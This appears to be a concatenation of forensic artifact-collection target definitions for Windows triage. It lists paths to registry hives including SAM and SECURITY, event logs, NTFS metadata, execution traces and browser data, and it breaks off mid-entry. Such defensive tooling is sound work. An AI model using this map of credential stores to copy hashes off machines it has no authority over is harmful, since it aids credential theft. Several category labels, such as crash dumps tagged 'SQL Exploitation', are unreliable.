Comment: "Locates Gigatribe files and copies them"
-
Name: Gigatribe Files Windows XP
Category: FileDownload
Path: C:\Documents and settings\*\*\Application Data\Gigatribe\*
IsDirectory: true
Recursive: true
Comment: Locates Gigatribe files and copies them. Different path depending on the Operating System language. In Swedish the location is C:\Documents and settings\<username>\Lokala Inställningar\Application Data\Gigatribe
-
Name: Gigatribe Files Windows XP
Category: FileDownload
Path: C:\Documents and settings\*\*\Application Data\Shalsoft\*
IsDirectory: true
Recursive: true
Comment: Locates Gigatribe files and copies them. Different path depending on the Operating System language. In Swedish the location is C:\Documents and settings\<username>\Lokala Inställningar\Application Data\Shalsoft
Description: XP Restore Points - System Volume Information directory
Author: Phill Moore
Version: 1
Id: 07f57a75-f9d9-42f3-842c-bd7e5abbb569
RecreateDirectories: true
Targets:
-
Name: System Volume Information
Category: Folder capture
Path: C:\System Volume Information
IsDirectory: true
Recursive: true
Comment: ""
Description: Windows Index Search
Author: Mark Hallman
Version: 1
Id: 9828b927-f955-464a-80fb-a48ce0101236
RecreateDirectories: true
Targets:
-
Name: WindowsIndexSearch
Category: FileKnowledge
Path: C:\programdata\microsoft\search\data\applications\windows\Windows.edb
IsDirectory: false
Recursive: false
Comment: ""
Description: Windows Firewall Logs
Author: Mike Cary
Version: 1
Id: e1c2040e-c1b4-47ef-973f-73a54c5e87ca
RecreateDirectories: true
Targets:
-
Name: Windows Firewall Logs
Category: WindowsFirewallLogs
Path: C:\Windows*\System32\LogFiles\Firewall\pfirewall.*
IsDirectory: false
Recursive: false
Comment: ""
Description: Windows Error Reporting
Author: Troy Larson
Version: 1
Id: 03106a1c-e1f8-4075-abdb-f9c83078347d
RecreateDirectories: true
Targets:
-
Name: WER Files
Category: Executables
Path: C:\ProgramData\Microsoft\Windows\WER
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Crash Dumps
Category: SQL Exploitation
Path: C:\Users\*\AppData\Local\CrashDumps\*.dmp
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Crash Dumps
Category: SQL Exploitation
Path: C:\Windows*\*.dmp
IsDirectory: false
Recursive: false
Comment: ""
Description: Windows Application Event Log
Author: Drew Ervin
Version: 1.0
Id: 2da16dbf-ea47-448e-a00f-fc442c3109ba
RecreateDirectories: true
Targets:
-
Name: Application Event Log XP
Category: EventLogs
Path: C:\Windows*\system32\config\AppEvent.evt
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Application Event Log Win7+
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\application.evtx
IsDirectory: false
Recursive: false
Comment: ""
Description: Windows 10 Notification DB
Author: Hadar Yudovich
Version: 1
Id: a5c3308d-8941-43c4-a295-b906a59bc895
RecreateDirectories: true
Targets:
-
Name: Windows 10 Notification DB
Category: Notifications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db
IsDirectory: false
Recursive: false
Comment: "Locates Windows notification db files"
-
Name: Windows 10 Notification DB
Category: Notifications
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Notifications\appdb.dat
IsDirectory: false
Recursive: false
Comment: "Locates Windows notification db files"
Description: Web-Based Enterprise Management (WBEM)
Author: Mark Hallman
Version: 1
Id: e985f5e3-f951-4e13-8099-a2a6877355cb
RecreateDirectories: true
Targets:
-
Name: WBEM
Category: WBEM
Path: C:\Windows*\System32\wbem\Repository
IsDirectory: true
Recursive: true
Comment: ""
Description: USB devices log files
Author: Eric Zimmerman
Version: 1
Id: 07ee308f-c79a-47de-a431-c93ab34e4b66
RecreateDirectories: true
Targets:
-
Name: Setupapi.log XP
Category: USBDevices
Path: C:\Windows\setupapi.log
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Setupapi.log Win7+
Category: USBDevices
Path: C:\Windows*\inf\setupapi.dev.log
IsDirectory: false
Recursive: false
Comment: ""
Description: Thumbcache DB
Author: Eric Zimmerman
Version: 1
Id: 1eec8849-b6eb-475b-a700-f4fb0055356d
RecreateDirectories: true
Targets:
-
Name: Thumbcache DB
Category: FileKnowledge
Path: C:\Users\*\AppData\Local\Microsoft\Windows\Explorer\thumbcache_*.db
IsDirectory: false
Recursive: false
Comment: ""
Description: System Resource Usage Monitor (SRUM) Data
Author: Mark Hallman
Version: 1
Id: 9858f1fc-5e22-46a0-8bfd-c821ac9b4a13
RecreateDirectories: true
Targets:
-
Name: SRUM
Category: Execution
Path: C:\Windows*\System32\SRU
IsDirectory: true
Recursive: true
Comment: ""
Description: System and user related Registry hives
Author: Eric Zimmerman
Version: 1
Id: 76af6086-bd0b-429f-bfd7-4a8e8ff8138f
RecreateDirectories: true
Targets:
-
Name: System Registry Files
Category: Registry
Path: RegistryHivesSystem.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: User Level Registry Files
Category: Registry
Path: RegistryHivesUser.tkape
IsDirectory: false
Recursive: false
Comment: ""
RegistryHivesUser
Description: User Related Registry hives
Author: Eric Zimmerman / Mark Hallman
Version: 1
Id: 635fbfd3-4a47-45b5-aae4-0a1bb6545d08
RecreateDirectories: true
Targets:
-
Name: ntuser.dat registry hive XP
Category: Registry
Path: C:\Documents and Settings\*\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat registry hive
Category: Registry
Path: C:\Users\*\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat registry transaction files
Category: Registry
Path: C:\Users\*\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat DEFAULT registry hive
Category: Registry
Path: C:\Windows*\System32\config\DEFAULT
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ntuser.dat DEFAULT transaction files
Category: Registry
Path: C:\Windows*\System32\config\DEFAULT.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: UsrClass.dat registry hive
Category: Registry
Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: UsrClass.dat registry transaction files
Category: Registry
Path: C:\Users\*\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
RegistryHivesSystem
Description: System level/related Registry hives
Author: Eric Zimmerman / Mark Hallman
Version: 1
Id: 2b7f40fd-cd02-47da-87da-9966fa5d8159
RecreateDirectories: true
Targets:
-
Name: SAM registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SAM.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SECURITY registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SECURITY.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SOFTWARE registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SOFTWARE.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\SYSTEM.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SAM registry hive
Category: Registry
Path: C:\Windows*\System32\config\SAM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SECURITY registry hive
Category: Registry
Path: C:\Windows*\System32\config\SECURITY
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SOFTWARE registry hive
Category: Registry
Path: C:\Windows*\System32\config\SOFTWARE
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry hive
Category: Registry
Path: C:\Windows*\System32\config\SYSTEM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RegBack registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\RegBack\*.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SAM registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SAM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SECURITY registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SECURITY
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SOFTWARE registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SOFTWARE
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SYSTEM
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SYSTEM registry hive (RegBack)
Category: Registry
Path: C:\Windows*\System32\config\RegBack\SYSTEM1
IsDirectory: false
Recursive: false
Comment: ""
-
Name: System Profile registry hive
Category: Registry
Path: C:\Windows*\System32\config\systemprofile\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: System Profile registry transaction files
Category: Registry
Path: C:\Windows*\System32\config\systemprofile\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Local Service registry hive
Category: Registry
Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Local Service registry transaction files
Category: Registry
Path: C:\Windows*\ServiceProfiles\LocalService\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Network Service registry hive
Category: Registry
Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Network Service registry transaction files
Category: Registry
Path: C:\Windows*\ServiceProfiles\NetworkService\ntuser.dat.LOG*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: System Restore Points Registry Hives (XP)
Category: Registry
Path: C:\System Volume Information\_restore*\RP*\snapshot\_REGISTRY_*
IsDirectory: false
Recursive: false
Comment: ""
Description: StartupInfo XML Files
Author: Hadar Yudovich
Version: 1
Id: 9bb477a3-fa6f-410d-8646-c3f987c147ce
RecreateDirectories: true
Targets:
-
Name: StartupInfo XML Files
Category: Persistence
Path: C:\Windows*\System32\WDI\LogFiles\StartupInfo\*.xml
IsDirectory: false
Recursive: false
Comment: ""
Description: Shim SDB FIles
Author: Troy Larson
Version: 1
Id: 99e82a85-e4d4-4139-930c-7eea9a45452f
RecreateDirectories: true
Targets:
-
Name: SDB Files
Category: Executables
Path: C:\Windows*\apppatch\Custom\*.sdb
IsDirectory: false
Recursive: false
Comment: ""
-
Name: SDB Files x64
Category: Executables
Path: C:\Windows*\apppatch\Custom\Custom64\*.sdb
IsDirectory: false
Recursive: false
Comment: ""
Description: Scheduled tasks (*.job and XML)
Author: Eric Zimmerman
Version: 1
Id: e5dc4367-2e6b-49bf-a90a-d4c1598bbe28
RecreateDirectories: true
Targets:
-
Name: at .job
Category: Persistence
Path: C:\Windows*\Tasks\*.job
IsDirectory: false
Recursive: false
Comment: ""
-
Name: at SchedLgU.txt
Category: Persistence
Path: C:\Windows*\SchedLgU.txt
IsDirectory: false
Recursive: false
Comment: ""
-
Name: XML
Category: Persistence
Path: C:\Windows*\system32\Tasks
IsDirectory: true
Recursive: true
Comment: ""
Description: Recycle Bin
Author: Phill Moore
Version: 1
Id: a22deca9-0c6e-4962-adf0-b082246aad57
RecreateDirectories: true
Targets:
-
Name: RecycleBinMetadata
Category: Deleted Files
Path: RecycleBinMetadata.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RecycleBinContent
Category: Deleted Files
Path: RecycleBinContent.tkape
IsDirectory: false
Recursive: false
Comment: ""
RecycleBinMetadata
Description: Recycle Bin Metadata
Author: Phill Moore
Version: 1
Id: 740cbac1-1792-434c-9f3b-b06b334ba635
RecreateDirectories: true
Targets:
-
Name: $Recycle.Bin
Category: Deleted Files
Path: C:\$Recycle.Bin\*\$I*
IsDirectory: false
Recursive: true
Comment: ""
-
Name: RECYCLER WinXP
Category: Deleted Files
Path: C:\RECYCLER\*\INFO2
IsDirectory: false
Recursive: true
Comment: ""
RecycleBinContent
Description: Recycle Bin Content
Author: Phill Moore
Version: 1.0
Id: 77404f0e-8d88-4eff-bf9c-a3e3fedba5d7
RecreateDirectories: true
Targets:
-
Name: $Recycle.Bin
Category: Deleted Files
Path: C:\$Recycle.Bin\*\$R*
IsDirectory: false
Recursive: true
Comment: ""
-
Name: RECYCLER WinXP
Category: Deleted Files
Path: C:\RECYCLER\*
IsDirectory: true
Recursive: true
Comment: ""
Description: Recycle Bin
Author: Mark Hallman
Version: 1
Id: 336abbbb-e9db-4d04-8904-43718e57df85
RecreateDirectories: true
Targets:
-
Name: $Recycle.Bin
Category: Deleted Files
Path: C:\$Recycle.Bin\*
IsDirectory: true
Recursive: true
Comment: ""
-
Name: RECYCLER WinXP
Category: Deleted Files
Path: C:\RECYCLER\*
IsDirectory: true
Recursive: true
Comment: ""
Description: RDP Logs
Author: Drew Ervin
Version: 1.0
Id: 6fa6ac8c-d940-4658-9c61-fdad4cf6416b
RecreateDirectories: true
Targets:
-
Name: RemoteConnectionManager Event Logs
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: LocalSessionManager Event Logs
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-TerminalServices-LocalSessionManager*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RDPClient Event Logs
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-TerminalServices-RDPClient*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RDPCoreTS Event Logs
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\Microsoft-Windows-RemoteDesktopServices-RdpCoreTS*
IsDirectory: false
Recursive: false
Comment: "Can be used to correlate RDP logon failures by originating IP"
Description: RDP Cache Files
Author: Hadar Yudovich
Version: 1
Id: 527a5de1-fb71-4efd-9701-89a30ea908e3
RecreateDirectories: true
Targets:
-
Name: RDP Cache Files
Category: FileSystem
Path: C:\Users\*\AppData\Local\Microsoft\Terminal Server Client\Cache
IsDirectory: true
Recursive: false
Comment: ""
-
Name: RDP Cache Files
Category: FileSystem
Path: C:\Documents and Settings\*\Local Settings\Application Data\Microsoft\Terminal Server Client\Cache
IsDirectory: true
Recursive: false
Comment: ""
Description: Office Document Cache
Author: Banaanhangwagen
Version: 1
Id: 15e92d9c-b02d-4cdf-a86e-bafb3d25af5c
RecreateDirectories: true
Targets:
-
Name: Office Document Cache
Category: FileKnowledge
Path: C:\Users\*\AppData\Local\Microsoft\Office\*\OfficeFileCache
IsDirectory: true
Recursive: true
Comment: ""
Description: Office Autosave
Author: Russ Taylor
Version: 1
Id: 71f1efe7-37be-4285-9896-11f0f6be2770
RecreateDirectories: true
Targets:
-
Name: Word Autosave Location
Category: FileKnowledge
Path: C:\Users\*\AppData\Roaming\Microsoft\Word\*
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Excel Autosave Location
Category: ApplicationCompatibility
Path: C:\Users\*\AppData\Roaming\Microsoft\Excel\*
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Powerpoint Autosave Location
Category: FileKnowledge
Path: C:\Users\*\AppData\Roaming\Microsoft\Powerpoint\*
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Publisher Autosave Location
Category: FileKnowledge
Path: C:\Users\*\AppData\Roaming\Microsoft\Publisher\*
IsDirectory: true
Recursive: true
Comment: ""
Description: Obtain detached signature catalog files
Author: Mike Pilkington
Version: 1
Id: 953b16e8-69ea-4967-9f9b-bcfa4f4fbe7b
RecreateDirectories: true
Targets:
-
Name: SignatureCatalog
Category: FileMetadata
Path: C:\Windows*\System32\CatRoot
IsDirectory: true
Recursive: true
Comment: ""
## USE CASE ##
# Validating digital signatures of an offline system can be problematic.
# Microsoft relies mostly on detached signature files to sign Windows
# executables. Checking those on an offline system using sigcheck.exe
# from SysInternals requires importing the target system's detached
# signature files into the anlysis system. To use with sigcheck, slightly
# rename the collected GUID directories (keeping the names in a GUID format),
# copy them to C:\Windows\System32\CatRoot of your analysis machine, restart
# Cryptographic Services, then run sigcheck against the target system files.
# This will import the target's signature files into the local analysis
# machine's signature database and should accurately validate the target
# system's files (which presumabley were collected with other KAPE modules).
# Kudos to Troy Larson for providing this workaround technique.
##
Description: MOF files (WMI)
Author: Eric Zimmerman
Version: 1.0
Id: 4fc9820c-3d30-4a38-2e48-5e0b745a4b0c
RecreateDirectories: true
Targets:
-
Name: MOF files
Category: WMI
Path: C:\
IsDirectory: true
Recursive: true
FileMask: "*.MOF"
Comment:
Description: LogFiles
Author: Fabian Murer
Version: 1
Id: 67c9bb8d-342b-4380-a110-565317fce014
RecreateDirectories: true
Targets:
-
Name: LogFiles
Category: Logs
Path: C:\Windows*\System32\LogFiles
IsDirectory: true
Recursive: true
Comment: ""
Description: Lnk files and jump lists
Author: Eric Zimmerman
Version: 1.1
Id: 5fc6820c-4d30-4a38-9e43-5e0b788a4b0c
RecreateDirectories: true
Targets:
-
Name: Lnk files from Recent
Category: LnkFiles
Path: C:\Users\*\AppData\Roaming\Microsoft\Windows\Recent
IsDirectory: true
Recursive: true
Comment: Also includes automatic and custom jumplist directories
-
Name: Lnk files from Microsoft Office Recent
Category: LnkFiles
Path: C:\Users\*\AppData\Roaming\Microsoft\Office\Recent
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Lnk files from Recent (XP)
Category: LnkFiles
Path: C:\Documents and Settings\*\Recent
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Desktop lnk files XP
Category: LnkFiles
Path: C:\Documents and Settings\*\Desktop\*.lnk
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Desktop lnk files
Category: LnkFiles
Path: C:\Users\*\Desktop\*.lnk
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Restore point lnk files XP
Category: LnkFiles
Path: C:\System Volume Information\_restore*\RP*\*.lnk
IsDirectory: false
Recursive: false
Comment: ""
Description: Linux on Windows Profile Files
Author: Troy Larson
Version: 1
Id: 9718a129-21f9-4354-a06f-2eddb112ab03
RecreateDirectories: true
Targets:
-
Name: .bash_history
Category: Windows Linux Profile
Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.bash_history
IsDirectory: false
Recursive: false
Comment: ""
-
Name: .bash_logout
Category: Windows Linux Profile
Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.bash_logout
IsDirectory: false
Recursive: false
Comment: ""
-
Name: .bashrc
Category: Windows Linux Profile
Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.bashrc
IsDirectory: false
Recursive: false
Comment: ""
-
Name: .profile
Category: Windows Linux Profile
Path: C:\Users\*\AppData\Local\Packages\*\LocalState\rootfs\home\*\.profile
IsDirectory: false
Recursive: false
Comment: ""
Description: Collect Event logs, Trace logs, Windows Firewall and PowerShell console
Author: Mike Cary
Version: 1
Id: 6e9f717f-01f8-4460-b552-a3a0ec7d7670
RecreateDirectories: true
Targets:
-
Name: Windows Event Logs
Category: EventLogs
Path: EventLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Event Trace Logs
Category: EventTraceLogs
Path: EventTraceLogs.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: PowerShell Console Log
Category: PowerShellConsoleLog
Path: PowerShellConsole.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Windows Firewall Log
Category: WindowsFirewallLogs
Path: WindowsFirewall.tkape
IsDirectory: false
Recursive: false
Comment: ""
EventLogs
Description: Event logs
Author: Eric Zimmerman
Version: 1
Id: d95784d9-bd1c-472b-aeef-de5d9ecc7aaa
RecreateDirectories: true
Targets:
-
Name: Event logs XP
Category: EventLogs
Path: C:\Windows\system32\config\*.evt
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Event logs Win7+
Category: EventLogs
Path: C:\Windows*\system32\winevt\logs\*.evtx
IsDirectory: false
Recursive: false
Comment: ""
EventTraceLogs
Description: Event Trace Logs
Author: Mark Hallman
Version: 1
Id: af494526-9e44-4548-9d29-f088eafa6f3d
RecreateDirectories: true
Targets:
-
Name: WDI Trace Logs 1
Category: Event Trace Logs
Path: C:\Windows*\System32\WDI\LogFiles\*.etl*
IsDirectory: false
Recursive: false
Comment: ""
-
Name: WDI Trace Logs 2
Category: Event Trace Logs
Path: C:\Windows*\System32\WDI\{*
IsDirectory: true
Recursive: true
Comment: ""
-
Name: WMI Trace Logs
Category: Event Trace Logs
Path: C:\Windows*\System32\LogFiles\WMI\*
IsDirectory: true
Recursive: true
Comment: ""
-
Name: SleepStudy Trace Logs
Category: Event Trace Logs
Path: C:\Windows*\System32\SleepStudy*
IsDirectory: true
Recursive: true
Comment: ""
-
Name: Energy-NTKL Trace Logs
Category: Event Trace Logs
Path: C:\ProgramData\Microsoft\Windows\PowerEfficiency Diagnostics\energy-ntkl.etl
IsDirectory: false
Recursive: false
Comment: ""
Description: File system metadata
Author: Eric Zimmerman
Version: 1
Id: 2bd97ef7-5fbf-4427-8ca2-ffb15d545b00
RecreateDirectories: true
Targets:
-
Name: $MFT
Category: FileSystem
Path: $MFT.tkape
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
-
Name: $LogFile
Category: FileSystem
Path: $LogFile.tkape
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
-
Name: $J
Category: FileSystem
Path: $J.tkape
IsDirectory: false
Recursive: false
SaveAsFileName: $J
Comment: ""
-
Name: $SDS
Category: FileSystem
Path: $SDS.tkape
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
SaveAsFileName: $Secure_$SDS
Comment: ""
-
Name: $Boot
Category: FileSystem
Path: $Boot.tkape
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
-
Name: $T
Category: FileSystem
Path: $T.tkape
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
SaveAsFileName: $T
Comment: ""
Description: EncapsulationLogging
Author: Troy Larson
Version: 1
Id: 7c328d9b-4a10-459d-b8b3-36d81686bc74
RecreateDirectories: true
Targets:
-
Name: EncapsulationLogging
Category: Executables
Path: C:\Windows*\Appcompat\Programs\EncapsulationLogging.hve
IsDirectory: false
Recursive: false
Comment: ""
-
Name: EncapsulationLogging Logs
Category: Executables
Path: C:\Windows*\Appcompat\Programs\EncapsulationLogging.log*
IsDirectory: false
Recursive: false
Comment: ""
Description: Current Group Policy Enforcement
Author: piesecurity
Version: 1
Id: e5595e9c-ebab-41db-a688-fdffe91f6fcb
RecreateDirectories: true
Targets:
-
Name: Local Group Policy INI Files
Category: Communication
Path: C:\Windows*\system32\grouppolicy\*.ini
IsDirectory: false
Recursive: false
-
Name: Local Group Policy Files - Registry Policy Files
Category: Communication
Path: C:\Windows*\system32\grouppolicy\*.pol
IsDirectory: false
Recursive: false
-
Name: Local Group Policy Files - Startup/Shutdown Scripts
Category: Communication
Path: C:\Windows*\system32\grouppolicy\*\Scripts
IsDirectory: true
Recursive: true
Description: Collect Win7+ RDP related Event logs
Author: Mark Hallman
Version: 1
Id: 2e79fc64-816c-439a-8b7f-93dd59bf2711
RecreateDirectories: true
Targets:
-
Name: Event logs Win7+
Category: EventLogs
Path: 'C:\Windows*\system32\winevt\logs\System.evtx'
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Event logs Win7+
Category: EventLogs
Path: 'C:\Windows*\system32\winevt\logs\Security.evtx'
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Event logs Win7+
Category: EventLogs
Path: 'G:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx'
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Event logs Win7+
Category: EventLogs
Path: 'G:\Windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx'
IsDirectory: false
Recursive: false
Comment: ""
Description: Boot Configuration Files
Author: Troy Larson
Version: 1
Id: eedec61a-bae4-4e96-a2cd-b6b30aa5a786
RecreateDirectories: true
Targets:
-
Name: BCD
Category: Registry
Path: C:\Boot\BCD
IsDirectory: false
Recursive: false
Comment: ""
-
Name: BCD Logs
Category: Registry
Path: C:\Boot\BCD.LOG*
IsDirectory: false
Recursive: false
Comment: ""
Description: ActivitiesCache.db collector
Author: Lee Whitfield
Version: 1
Id: 8315040f-c9a4-455a-b02c-96372583f436
RecreateDirectories: true
Targets:
-
Name: ActivitiesCache.db
Category: FileFolderAccess
Path: C:\Users\*\AppData\Local\ConnectedDevicesPlatform\*\ActivitiesCache.db
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ActivitiesCache.db-shm
Category: FileFolderAccess
Path: C:\Users\*\AppData\Local\ConnectedDevicesPlatform\*\ActivitiesCache.db-shm
IsDirectory: false
Recursive: false
Comment: ""
-
Name: ActivitiesCache.db-wal
Category: FileFolderAccess
Path: C:\Users\*\AppData\Local\ConnectedDevicesPlatform\*\ActivitiesCache.db-wal
IsDirectory: false
Recursive: false
Comment: ""
Description: syscache.hve
Author: Phill Moore
Version: 1
Id: d4665b13-9953-4cf0-bdc4-6fcb7a37842f
RecreateDirectories: true
Targets:
-
Name: Syscache
Category: Program Execution
Path: C:\System Volume Information\Syscache.hve
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Syscache transaction files
Category: Program Execution
Path: C:\System Volume Information\Syscache.hve.LOG*
IsDirectory: false
Recursive: false
Comment: ""
Description: Prefetch files
Author: Eric Zimmerman
Version: 1
Id: f6715d3f-b8ca-4cc2-9e5e-4ed18e88abbe
RecreateDirectories: true
Targets:
-
Name: Prefetch
Category: Prefetch
Path: C:\Windows*\prefetch\*.pf
IsDirectory: false
Recursive: false
Comment: ""
Description: Amcache.hve
Author: Eric Zimmerman
Version: 1
Id: 0d93d3fc-1b09-4894-b21f-dddc7f269934
RecreateDirectories: true
Targets:
-
Name: RecentFileCache
Category: ApplicationCompatability
Path: C:\Windows*\AppCompat\Programs\RecentFileCache.bcf
IsDirectory: false
Recursive: false
Comment: ""
Description: Amcache.hve
Author: Eric Zimmerman
Version: 1
Id: 13ba1e33-4899-4843-adf1-c7e6b20d759a
RecreateDirectories: true
Targets:
-
Name: Amcache
Category: ApplicationCompatibility
Path: C:\Windows*\AppCompat\Programs\Amcache.hve
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Amcache transaction files
Category: ApplicationCompatibility
Path: C:\Windows*\AppCompat\Programs\Amcache.hve.LOG*
IsDirectory: false
Recursive: false
Comment: ""
Description: Evidence of execution related files
Author: Eric Zimmerman
Version: 1
Id: 13ba1e33-4899-4843-adf0-c7e6a20d758a
RecreateDirectories: true
Targets:
-
Name: Prefetch
Category: Prefetch
Path: Prefetch.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: RecentFileCache
Category: ApplicationCompatability
Path: RecentFileCache.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Amcache
Category: ApplicationCompatability
Path: Amcache.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Syscache
Category: Syscache
Path: Syscache.tkape
IsDirectory: false
Recursive: false
Comment: ""
Childs
Description: $T
Author: Eric Zimmerman
Version: 1
Id: 8c568aa0-9a67-4035-9720-1423770bc29a
RecreateDirectories: true
Targets:
-
Name: $T
Category: FileSystem
Path: c:\$Extend\$RmMetadata\$TxfLog\$Tops:$T
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
SaveAsFileName: $T
Comment: ""
Description: $SDS
Author: Eric Zimmerman
Version: 1
Id: 72d56db2-b8da-4830-a2e7-37437c90e18f
RecreateDirectories: true
Targets:
-
Name: $SDS
Category: FileSystem
Path: c:\$Secure:$SDS
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
SaveAsFileName: $Secure_$SDS
Comment: ""
Description: $MFT
Author: Eric Zimmerman
Version: 1
Id: 2b3d01e2-25e1-4079-a630-6cb6e2069456
RecreateDirectories: true
Targets:
-
Name: $MFT
Category: FileSystem
Path: C:\$MFT
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
Description: $LogFile
Author: Eric Zimmerman
Version: 1
Id: b98612e0-f679-400a-954f-c0b2bc86147b
RecreateDirectories: true
Targets:
-
Name: $LogFile
Category: FileSystem
Path: C:\$LogFile
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
Description: $J
Author: Eric Zimmerman
Version: 1
Id: 2a9c6f80-250b-42a6-9d29-90cb0a20f7be
RecreateDirectories: true
Targets:
-
Name: $J
Category: FileSystem
Path: c:\$Extend\$UsnJrnl:$J
IsDirectory: false
Recursive: false
SaveAsFileName: $J
Comment: ""
-
Name: $Max
Category: FileSystem
Path: c:\$Extend\$UsnJrnl:$Max
IsDirectory: false
Recursive: false
SaveAsFileName: $Max
Comment: ""
Description: $Boot
Author: Eric Zimmerman
Version: 1
Id: 9f24d727-fcf0-492d-97cc-108472eb4e00
RecreateDirectories: true
Targets:
-
Name: $Boot
Category: FileSystem
Path: c:\$Boot
IsDirectory: false
Recursive: false
AlwaysAddToQueue: true
Comment: ""
Description: Web browser history, bookmarks, etc.
Author: Eric Zimmerman
Version: 1
Id: e4ffb938-dcc0-4d91-9c77-3aa303d38512
RecreateDirectories: true
Targets:
-
Name: Internet Explorer
Category: Communications
Path: InternetExplorer.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Chrome
Category: Communications
Path: Chrome.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: FireFox
Category: Communications
Path: FireFox.tkape
IsDirectory: false
Recursive: false
Comment: ""
-
Name: Edge
Category: Communications
Path: Edge.tkape
IsDirectory: false
Recursive: false
Comment: ""
Edge
Description: Edge
Author: Phill Moore
Version: 1
Id: c72bd45c-2a24-4df9-aa0b-3d7048c90337
RecreateDirectories: true
Targets:
-
Name: Edge folder
Category: Communications
Path: C:\Users\*\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe
IsDirectory: True
Recursive: True
Comment: ""
-
Name: WebcacheV01.dat
Category: Communications
